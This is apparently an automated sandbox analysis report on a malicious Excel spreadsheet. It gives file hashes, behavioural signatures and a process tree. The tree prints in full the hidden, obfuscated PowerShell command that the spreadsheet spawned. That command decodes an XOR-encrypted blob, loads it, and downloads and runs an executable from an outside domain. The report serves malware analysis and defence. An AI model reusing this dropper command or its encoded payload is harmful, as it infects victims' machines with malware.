Analysis
-
max time kernel
47s -
max time network
33s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
08-12-2024 22:07
Behavioral task
behavioral1
Sample
2010a35082eff3568cc93f0ae0b78b0c3c426d5f4b17d79380b0966fdf98caaf.xls
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2010a35082eff3568cc93f0ae0b78b0c3c426d5f4b17d79380b0966fdf98caaf.xls
Resource
win10v2004-20241007-en
General
-
Target
2010a35082eff3568cc93f0ae0b78b0c3c426d5f4b17d79380b0966fdf98caaf.xls
-
Size
56KB
-
MD5
cdddcb8694ce3a5ed4966c715a2e382a
-
SHA1
92d7ea6ef276c96188a5cafd30ac1a5c2a716eef
-
SHA256
2010a35082eff3568cc93f0ae0b78b0c3c426d5f4b17d79380b0966fdf98caaf
-
SHA512
668dd75f50ed7af639adc9d46d225790e8f59d3e469628ffb095ff5fdc1d51f37fe6d9a0769a5daeb228564abfd72c10fcfd56d6387e438c5c5165fc454122a8
-
SSDEEP
1536:lk3hOdsylKlgryzc4bNhZFGzE+cL2knAzqCXHzFp/iE:lk3hOdsylKlgryzc4bNhZFGzE+cL2knv
Malware Config
Extracted
https://igyygyigus.com/new/smscscript090002000.exe
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 100 1752 powershell.exe 83 -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 100 powershell.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1752 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 100 powershell.exe 100 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 100 powershell.exe -
Suspicious use of SetWindowsHookEx 10 IoCs
pid Process 1752 EXCEL.EXE 1752 EXCEL.EXE 1752 EXCEL.EXE 1752 EXCEL.EXE 1752 EXCEL.EXE 1752 EXCEL.EXE 1752 EXCEL.EXE 1752 EXCEL.EXE 1752 EXCEL.EXE 1752 EXCEL.EXE -
Suspicious use of WriteProcessMemory 2 IoCs
description pid Process procid_target PID 1752 wrote to memory of 100 1752 EXCEL.EXE 86 PID 1752 wrote to memory of 100 1752 EXCEL.EXE 86
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\2010a35082eff3568cc93f0ae0b78b0c3c426d5f4b17d79380b0966fdf98caaf.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1752 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden -noprofile -ExecutionPolicy RemoteSigned function v4bad81 { param($ndddb) $z717f = 'a25baab'; $r8f981d = ''; for ($i = 0; $i -lt $ndddb.length; $i+=2) { $o622e = [convert]::ToByte($ndddb.Substring($i, 2), 16); $r8f981d += [char]($o622e -bxor $z717f[($i / 2) % $z717f.length]); } return $r8f981d; } $x642a = '14415c0c064131184141070c5a6f6b47460b0f0642324b4616040c4c33475b16080c074f7b5b1604130d1161501017080104410e6f6b1117035e5c0141020e004146420e50570305076f6b1a6f6b12154241414241126e260d0d2b0c425a101549400a57470c040d5153101c3f6c6b42411215424141421147570e08024212465416080242044a4107130f42285c413215134226574132130e0120565110041211497b5b16311510415a780d05140e041e151115130b0f551512130e012f535807485a6f6b12154241414241126e260d0d2b0c425a101549400a57470c040d5153101c3f6c6b42411215424141421147570e08024212465416080242044a4107130f42285c41321513422d5d54062d08001353471b491216135b5b05410f030c571c596c6b42411215424141423a76590e280c120e40414a430a07135c500e525340486f386841414241121542411117035e5c0141121600465c0141041a1557470c41030d0e5e153408131614535932130e160451414a280f16314647420d11230556470712124e41677c0c15311613125115320818041e1517080f164154592c041632135d410702154e415d401641140b0f46150e11070e2e5e5132130e160451414b5a6c68411215424141424169710e0d280f115d471649432904405b070d52504f56590e434d42245c411018310d085c41425c41403346592f0e17072c57580d1318404d126607152d0312467010130e10410f1504000d11041b686f6b4142411215424141111553410b024107194650100f41140e5b51422c0e14047f500f0e131b497b5b1631151041565011154d42285c41321513421240564e41080c1512460b1b044b5a3f3f6f6b4142411215424141121450590b0241111553410b02410b0f461510030257550b074a486c6841121542414142414938684141424112154241414241127c0c15311613125e5b59005b5054155f412d0d0056790b031303134b1d14550303050a044a4351525454015451035607020052045106431b1c596c6b42411215424141424112154208074249590c5a0058530712085f41280c156241104f3b07135d1c6f6b414241121542414142411215196c6b4241121542414142411215424141424140501614130c41030e6f6b4142411215424141424112151f6c6b6f6b1215424141424112154241412b0f466516134115020a0050415c4226574132130e012056511004121149590c5a005853071e1514550303050a044a4353525454015451035153020752525104560201525155525602015351434b480938684141424112154241414241125c04414915020a0050415c5f417b5b163115104f6850100e486f6b121542414142411215424141196c381542414142411215424141424112154213041614405b42505a6f6b1215424141424112154241411f6c383868414142411215424141424112602b0f15321540150616320b1b57155f414937285c413215134b54093868414142411215424141424112400b0f15423b57470d415c42510938684141424112154241414241125c04414943375b471614000e31405a160402164945565a54534e41564231081b074d12051a55514e415d4016413b07135d1c4b6c6b4241121542414142411215421a6c684112154241414241121542414142411247071514100f1204596c6b4241121542414142411215421c6c68411215424141424112154241231b15576e3f41310315515d425c411941024d51504d42514a53044d4152190b05421c5a6f6b1215424141424112154241412b0f4665161341170f5f540c00060705625a0b0f1507131208422c0010125a540e4f200e0d5d562a260d0d0353594a5248596c381542414142411215424141422c53471109000e4f715a121849320046560a4d41524d12400c0c000c00555006310e0b0f4650104d415148093868414142411215424141424112780d17042f045f5a1018490c0445152b0f153215401d15025957531c610d280f1657061d4b414a42514a055250034b4d12400c0c000c00555006310e0b0f4650104d41514809386841414241121542414142411247071514100f1205596c6b42411215424141421c3f3f6b681117035e5c0141121600465c01411216135b5b054117560353515a50491115405c0c06411115407c0c486c68411215424141424149386868686b1246470b0f064213505356545256410f154000535703535400435a6f6b1215424141424112154241411115405c0c06410f5806040603415f41614110080f054f7758121518596c38154241414241121542414142075d474249080c15125c425c41525a125c425d411115407c0c4f2d070f55410a5a410b4119084253486f6b121542414142411215424141196c38154241414241121542414142411215420318160412575553525052120842220e0c175747164f350d234b4107491216137b5b4c3214001246470b0f064a081e1550484d4250041c596c6b424112154241414241121542414142415f0c565005004119084249020a00401c4a035650520006423f411003540157525539495b154d41534b411715100307565401014c2d040c06465d3f485a6f6b1215424141424112154241411f6c38386841414241121542414142411247071514100f12585b5550060309386841414241121542411c6f6b4f'; $x642a2 = v4bad81($x642a); Add-Type -TypeDefinition $x642a2; [o15b72]::rbc5492(); Start-Sleep -s 1; $m83735 = $env:APPDATA; $zeb93 = $m83735 + '\\b1bbb65.exe'; If (test-path $zeb93) {Remove-Item $zeb93}; $yee8b6 = New-Object System.Net.WebClient; $yee8b6.Headers['User-Agent'] = 'yee8b6'; $yee8b6.DownloadFile('https://igyygyigus.com/new/smscscript090002000.exe', $zeb93); Start-Process -Filepath $zeb93;2⤵
- Process spawned unexpected child process
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:100
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
Filesize5KB
MD5aef84f756c345ff0d31de3463e2bf36e
SHA189404752d80a41987adabba4f7ce239dbc5c6452
SHA256d9a43e89c6c17e1709011281a505e05119b7cfbfb7973162d379746247b11f18
SHA5129466264f85d93e538495c6a96d6da7779ab6053133f40169605314a346c71257bbc606342beaa38026947a31d1458b514a0d9a84e077638cf1109f3e01c4c80c